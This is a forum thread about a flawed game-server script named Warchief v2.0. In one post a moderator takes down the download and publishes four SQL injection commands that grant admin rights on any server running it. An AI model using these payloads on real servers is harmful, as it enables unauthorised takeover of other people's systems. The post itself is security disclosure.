[Insecure] HTC & Clan TOR - [0.4] Warchief v2.0

Started by HTC, Jul 25, 2015, 12:52 PM

Previous topic - Next topic

HTC

HTC & Clan TOR - [0.4] Warchief v2.0

Build: 10156 (Update 25/07/2015)

Language: Portuguese-BR (The English version will be available soon)

Version [0.4] Warchief 2.0 additional controls and systems* MatheuS (Country Detector, mute, unmute) - sseebbyy (Nitrous Oxide Systems) - Banaqs (Vehicle Fix Function) - JaVeD (News System) - ADM Script v1.0 (Command format: Kick and Killp) - Diego (Ban and Unban) - Beztone (Command format: Setmon) - George (Gotoloc and Saveloc) - Ksna's Cops and Robbers (Special commands)

Updates will be released to fix bugs that still exist in this version

REMOVED - INSECURE

KAKAN

Can u tell me that from where did u find that mute and unmute system?
oh no

ThunderStorm

Quote from: KAKAN on Jul 25, 2015, 01:25 PMCan u tell me that from where did u find that mute and unmute system?



Quote from: HTC on Jul 25, 2015, 12:52 PMMatheuS (Country Detector, mute, unmute)



[VSS]Shawn

Warchief o.0 i might think it will be remove

Ksna

#4
I guess it will not be removed it has enough credits

KAKAN

Quote from: ThunderStorm on Jul 25, 2015, 01:54 PM
Quote from: KAKAN on Jul 25, 2015, 01:25 PMCan u tell me that from where did u find that mute and unmute system?



Quote from: HTC on Jul 25, 2015, 12:52 PMMatheuS (Country Detector, mute, unmute)
I think I asked "where", not from "whom", caz the mute and unmute system aren't working fine
oh no

MatheuS

I do not remember having created no system mute and unmute. ???
if( !sucess ) tryAgain();
Thanks to the VCMP community. It was the happiest period of my life.

Joao^

lol milena por que colocou seu server aqui parou de jogar?

Stormeus

Quote from: [VSS]Shawn on Jul 25, 2015, 03:19 PMWarchief o.0 i might think it will be remove

Well it's okay. It's just literally a straight port of the old Warchiefs (the commands still say they start with /c) but with a lot of other people's snippets duct taped onto it, but that's not a reason to take it down.

What I am going to point out is that this script is amazingly vulnerable to SQL injection. Since I'm already taking down the link because of this, here's a full disclosure:

You can easily gain admin rights on any server that runs this script by using any of these commands and rejoining:

Quote/quote '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/buycar '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/gotoloc '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/nogoto '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--

Virtually no user input is escaped using the escapeSQLString function in SQLite; consequently, these are a few commands that use user input and add them to the query without escaping, generating this flaw. I would absolutely not recommend using this until this script is largely fixed.

HTC

These problems will be corrected and on some days the server will be posted again

UncleRus

I LoperkinDead.My brothers scripters TimyrSem,VladSem

SHy^

Quote from: UncleRus on Sep 26, 2020, 09:54 AMWho can give me this script pm me!

Idiotic, mentalism, and problematic people. Can you for god sake stop bumping topics and learn something at your own? You're continuously bumping the topics and begging for scripts which were either removed or link was expire. I've a 100% doubt that the scripts you released are full of trash and broken pieces of snippets taken from forum, and how did I know it? Because of your this infinite stupidness. I hope you regret it by any way.(ban maybe). This is the main reason people leaving this community cuz of stupid people like you.

UncleRus

I LoperkinDead.My brothers scripters TimyrSem,VladSem

DizzasTeR

Don't know why Storm forgot to lock this topic, perhaps he was expecting the topic creator to update and post a secure link...

Locked.